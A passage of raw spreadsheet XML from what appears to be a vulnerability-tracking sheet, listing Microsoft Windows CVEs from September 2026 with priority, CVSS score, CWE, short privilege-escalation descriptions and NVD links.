t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P485" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q485" s="5" t="inlineStr" /><c r="R485" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S485" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t></is></c></row><row r="486"><c r="A486" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C486" s="5" t="inlineStr"><is><t>CVE-2026-69277</t></is></c><c r="D486" s="5" t="n"><v>7.8</v></c><c r="E486" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F486" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G486" s="5" t="inlineStr" /><c r="H486" s="5" t="n"><v>0.003</v></c><c r="I486" s="5" t="inlineStr" /><c r="J486" s="5" t="inlineStr" /><c r="K486" s="5" t="inlineStr" /><c r="L486" s="5" t="inlineStr" /><c r="M486" s="5" t="inlineStr" /><c r="N486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P486" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q486" s="5" t="inlineStr" /><c r="R486" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S486" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t></is></c></row><row r="487"><c r="A487" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C487" s="5" t="inlineStr"><is><t>CVE-2026-69283</t></is></c><c r="D487" s="5" t="n"><v>7.8</v></c><c r="E487" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F487" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G487" s="5" t="inlineStr" /><c r="H487" s="5" t="n"><v>0.002</v></c><c r="I487" s="5" t="inlineStr" /><c r="J487" s="5" t="inlineStr" /><c r="K487" s="5" t="inlineStr" /><c r="L487" s="5" t="inlineStr" /><c r="M487" s="5" t="inlineStr" /><c r="N487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P487" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q487" s="5" t="inlineStr" /><c r="R487" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S487" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t></is></c></row><row r="488"><c r="A488" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C488" s="5" t="inlineStr"><is><t>CVE-2026-69284</t></is></c><c r="D488" s="5" t="n"><v>7.8</v></c><c r="E488" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G488" s="5" t="inlineStr" /><c r="H488" s="5" t="n"><v>0.002</v></c><c r="I488" s="5" t="inlineStr" /><c r="J488" s="5" t="inlineStr" /><c r="K488" s="5" t="inlineStr" /><c r="L488" s="5" t="inlineStr" /><c r="M488" s="5" t="inlineStr" /><c r="N488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P488" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q488" s="5" t="inlineStr" /><c r="R488" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S488" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t></is></c></row><row r="489"><c r="A489" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C489" s="5" t="inlineStr"><is><t>CVE-2026-69289</t></is></c><c r="D489" s="5" t="n"><v>7.8</v></c><c r="E489" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G489" s="5" t="inlineStr" /><c r="H489" s="5" t="n"><v>0.004</v></c><c r="I489" s="5" t="inlineStr" /><c r="J489" s="5" t="inlineStr" /><c r="K489" s="5" t="inlineStr" /><c r="L489" s="5" t="inlineStr" /><c r="M489" s="5" t="inlineStr" /><c r="N489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P489" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q489" s="5" t="inlineStr" /><c r="R489" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S489" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t></is></c></row><row r="490"><c r="A490" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C490" s="5" t="inlineStr"><is><t>CVE-2026-69290</t></is></c><c r="D490" s="5" t="n"><v>7.8</v></c><c r="E490" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G490" s="5" t="inlineStr" /><c r="H490" s="5" t="n"><v>0.002</v></c><c r="I490" s="5" t="inlineStr" /><c r="J490" s="5" t="inlineStr" /><c r="K490" s="5" t="inlineStr" /><c r="L490" s="5" t="inlineStr" /><c r="M490" s="5" t="inlineStr" /><c r="N490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P490" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q490" s="5" t="inlineStr" /><c r="R490" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S490" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t></is></c></row><row r="491"><c r="A491" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C491" s="5" t="inlineStr"><is><t>CVE-2026-69293</t></is></c><c r="D491" s="5" t="n"><v>7.8</v></c><c r="E491" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G491" s="5" t="inlineStr" /><c r="H491" s="5" t="n"><v>0.002</v></c><c r="I491" s="5" t="inlineStr" /><c r="J491" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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1" s="5" t="inlineStr" /><c r="M491" s="5" t="inlineStr" /><c r="N491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P491" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q491" s="5" t="inlineStr" /><c r="R491" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S491" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t></is></c></row><row r="492"><c r="A492" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C492" s="5" t="inlineStr"><is><t>CVE-2026-69295</t></is></c><c r="D492" s="5" t="n"><v>7.8</v></c><c r="E492" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G492" s="5" t="inlineStr" /><c r="H492" s="5" t="n"><v>0.003</v></c><c r="I492" s="5" t="inlineStr" /><c r="J492" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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2" s="5" t="inlineStr" /><c r="M492" s="5" t="inlineStr" /><c r="N492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P492" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q492" s="5" t="inlineStr" /><c r="R492" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S492" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t></is></c></row><row r="493"><c r="A493" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C493" s="5" t="inlineStr"><is><t>CVE-2026-69298</t></is></c><c r="D493" s="5" t="n"><v>7.8</v></c><c r="E493" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G493" s="5" t="inlineStr" /><c r="H493" s="5" t="n"><v>0.003</v></c><c r="I493" s="5" t="inlineStr" /><c r="J493" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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3" s="5" t="inlineStr" /><c r="M493" s="5" t="inlineStr" /><c r="N493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P493" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q493" s="5" t="inlineStr" /><c r="R493" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S493" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t></is></c></row><row r="494"><c r="A494" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C494" s="5" t="inlineStr"><is><t>CVE-2026-69307</t></is></c><c r="D494" s="5" t="n"><v>7.8</v></c><c r="E494" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F494" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G494" s="5" t="inlineStr" /><c r="H494" s="5" t="n"><v>0.003</v></c><c r="I494" s="5" t="inlineStr" /><c r="J494" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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4" s="5" t="inlineStr" /><c r="M494" s="5" t="inlineStr" /><c r="N494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P494" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q494" s="5" t="inlineStr" /><c r="R494" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S494" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t></is></c></row><row r="495"><c r="A495" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C495" s="5" t="inlineStr"><is><t>CVE-2026-69312</t></is></c><c r="D495" s="5" t="n"><v>7.8</v></c><c r="E495" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F495" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G495" s="5" t="inlineStr" /><c r="H495" s="5" t="n"><v>0.003</v></c><c r="I495" s="5" t="inlineStr" /><c r="J495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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5" s="5" t="inlineStr" /><c r="M495" s="5" t="inlineStr" /><c r="N495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O495" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P495" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q495" s="5" t="inlineStr" /><c r="R495" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S495" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t></is></c></row><row r="496"><c r="A496" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C496" s="5" t="inlineStr"><is><t>CVE-2026-69323</t></is></c><c r="D496" s="5" t="n"><v>7.8</v></c><c r="E496" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G496" s="5" t="inlineStr" /><c r="H496" s="5" t="n"><v>0.003</v></c><c r="I496" s="5" t="inlineStr" /><c r="J496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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6" s="5" t="inlineStr" /><c r="M496" s="5" t="inlineStr" /><c r="N496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P496" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q496" s="5" t="inlineStr" /><c r="R496" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S496" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t></is></c></row><row r="497"><c r="A497" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C497" s="5" t="inlineStr"><is><t>CVE-2026-69324</t></is></c><c r="D497" s="5" t="n"><v>7.8</v></c><c r="E497" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G497" s="5" t="inlineStr" /><c r="H497" s="5" t="n"><v>0.003</v></c><c r="I497" s="5" t="inlineStr" /><c r="J497" s="5" t="inlineStr" /><c r="K497" s="5" t="inlineStr" /><c r="L497" s="5" t="inlineStr" /><c r="M497" s="5" t="inlineStr" /><c r="N497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P497" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q497" s="5" t="inlineStr" /><c r="R497" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S497" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t></is></c></row><row r="498"><c r="A498" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C498" s="5" t="inlineStr"><is><t>CVE-2026-69328</t></is></c><c r="D498" s="5" t="n"><v>7.8</v></c><c r="E498" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G498" s="5" t="inlineStr" /><c r="H498" s="5" t="n"><v>0.003</v></c><c r="I498" s="5" t="inlineStr" /><c r="J498" s="5" t="inlineStr" /><c r="K498" s="5" t="inlineStr" /><c r="L498" s="5" t="inlineStr" /><c r="M498" s="5" t="inlineStr" /><c r="N498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P498" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q498" s="5" t="inlineStr" /><c r="R498" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S498" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t></is></c></row><row r="499"><c r="A499" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C499" s="5" t="inlineStr"><is><t>CVE-2026-69348</t></is></c><c r="D499" s="5" t="n"><v>7.8</v></c><c r="E499" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G499" s="5" t="inlineStr" /><c r="H499" s="5" t="n"><v>0.003</v></c><c r="I499" s="5" t="inlineStr" /><c r="J499" s="5" t="inlineStr" /><c r="K499" s="5" t="inlineStr" /><c r="L499" s="5" t="inlineStr" /><c r="M499" s="5" t="inlineStr" /><c r="N499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P499" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q499" s="5" t="inlineStr" /><c r="R499" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S499" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t></is></c></row><row r="500"><c r="A500" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C500" s="5" t="inlineStr"><is><t>CVE-2026-69352</t></is></c><c r="D500" s="5" t="n"><v>7.8</v></c><c r="E500" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F500" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G500" s="5" t="inlineStr" /><c r="H500" s="5" t="n"><v>0.003</v></c><c r="I500" s="5" t="inlineStr" /><c r="J500" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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00" s="5" t="inlineStr" /><c r="M500" s="5" t="inlineStr" /><c r="N500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P500" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q500" s="5" t="inlineStr" /><c r="R500" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S500" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t></is></c></row><row r="501"><c r="A501" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C501" s="5" t="inlineStr"><is><t>CVE-2026-69359</t></is></c><c r="D501" s="5" t="n"><v>7.8</v></c><c r="E501" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F501" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G501" s="5" t="inlineStr" /><c r="H501" s="5" t="n"><v>0.003</v></c><c r="I501" s="5" t="inlineStr" /><c r="J501" s="5" t="inlineStr" /><c r="K501" s="5" t="inlineStr" /><c r="L501" s="5" t="inlineStr" /><c r="M501" s="5" t="inlineStr" /><c r="N501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P501" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q501" s="5" t="inlineStr" /><c r="R501" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S501" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t></is></c></row><row r="502"><c r="A502" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C502" s="5" t="inlineStr"><is><t>CVE-2026-69368</t></is></c><c r="D502" s="5" t="n"><v>7.8</v></c><c r="E502" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G502" s="5" t="inlineStr" /><c r="H502" s="5" t="n"><v>0.002</v></c><c r="I502" s="5" t="inlineStr" /><c r="J502" s="5" t="inlineStr" /><c r="K502" s="5" t="inlineStr" /><c r="L502" s="5" t="inlineStr" /><c r="M502" s="5" t="inlineStr" /><c r="N502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P502" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q502" s="5" t="inlineStr" /><c r="R502" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S502" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t></is></c></row><row r="503"><c r="A503" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C503" s="5" t="inlineStr"><is><t>CVE-2026-69377</t></is></c><c r="D503" s="5" t="n"><v>7.8</v></c><c r="E503" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F503" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G503" s="5" t="inlineStr" /><c r="H503" s="5" t="n"><v>0.003</v></c><c r="I503" s="5" t="inlineStr" /><c r="J503" s="5" t="inlineStr" /><c r="K503" s="5" t="inlineStr" /><c r="L503" s="5" t="inlineStr" /><c r="M503" s="5" t="inlineStr" /><c r="N503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O503" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P503" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q503" s="5" t="inlineStr" /><c r="R503" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S503" s="5" t="inlineStr"><is><t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t></is></c></row><row r="504"><c r="A504" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C504" s="5" t="inlineStr"><is><t>CVE-2026-69389</t></is></c><c r="D504" s="5" t="n"><v>7.8</v></c><c r="E504" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F504" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G504" s="5" t="inlineStr" /><c r="H504" s="5" t="n"><v>0.003</v></c><c r="I504" s="5" t="inlineStr" /><c r="J504" s="5" t="inlineStr" /><c r="K504" s="5" t="inlineStr" /><c r="L504" s="5" t="inlineStr" /><c r="M504" s="5" t="inlineStr" /><c r="N504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P504" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q504" s="5" t="inlineStr" /><c r="R504" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S504" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t></is></c></row><row r="505"><c r="A505" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C505" s="5" t="inlineStr"><is><t>CVE-2026-69391</t></is></c><c r="D505" s="5" t="n"><v>7.8</v></c><c r="E505" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F505" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G505" s="5" t="inlineStr" /><c r="H505" s="5" t="n"><v>0.003</v></c><c r="I505" s="5" t="inlineStr" /><c r="J505" s="5" t="inlineStr" /><c r="K505" s="5" t="inlineStr" /><c r="L505" s="5" t="inlineStr" /><c r="M505" s="5" t="inlineStr" /><c r="N505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P505" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q505" s="5" t="inlineStr" /><c r="R505" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S505" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t></is></c></row><row r="506"><c r="A506" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C506" s="5" t="inlineStr"><is><t>CVE-2026-69392</t></is></c><c r="D506" s="5" t="n"><v>7.8</v></c><c r="E506" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G506" s="5" t="inlineStr" /><c r="H506" s="5" t="n"><v>0.003</v></c><c r="I506" s="5" t="inlineStr" /><c r="J506" s="5" t="inlineStr" /><c r="K506" s="5" t="inlineStr" /><c r="L506" s="5" t="inlineStr" /><c r="M506" s="5" t="inlineStr" /><c r="N506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P506" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q506" s="5" t="inlineStr" /><c r="R506" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S506" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t></is></c></row><row r="507"><c r="A507" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C507" s="5" t="inlineStr"><is><t>CVE-2026-69407</t></is></c><c r="D507" s="5" t="n"><v>7.8</v></c><c r="E507" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F507" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G507" s="5" t="inlineStr" /><c r="H507" s="5" t="n"><v>0.003</v></c><c r="I507" s="5" t="inlineStr" /><c r="J507" s="5" t="inlineStr" /><c r="K507" s="5" t="inlineStr" /><c r="L507" s="5" t="inlineStr" /><c r="M507" s="5" t="inlineStr" /><c r="N507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P507" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q507" s="5" t="inlineStr" /><c r="R507" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S507" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t></is></c></row><row r="508"><c r="A508" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C508" s="5" t="inlineStr"><is><t>CVE-2026-69420</t></is></c><c r="D508" s="5" t="n"><v>7.8</v></c><c r="E508" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F508" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G508" s="5" t="inlineStr" /><c r="H508" s="5" t="n"><v>0.003</v></c><c r="I508" s="5" t="inlineStr" /><c r="J508" s="5" t="inlineStr" /><c r="K508" s="5" t="inlineStr" /><c r="L508" s="5" t="inlineStr" /><c r="M508" s="5" t="inlineStr" /><c r="N508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P508" s="5" 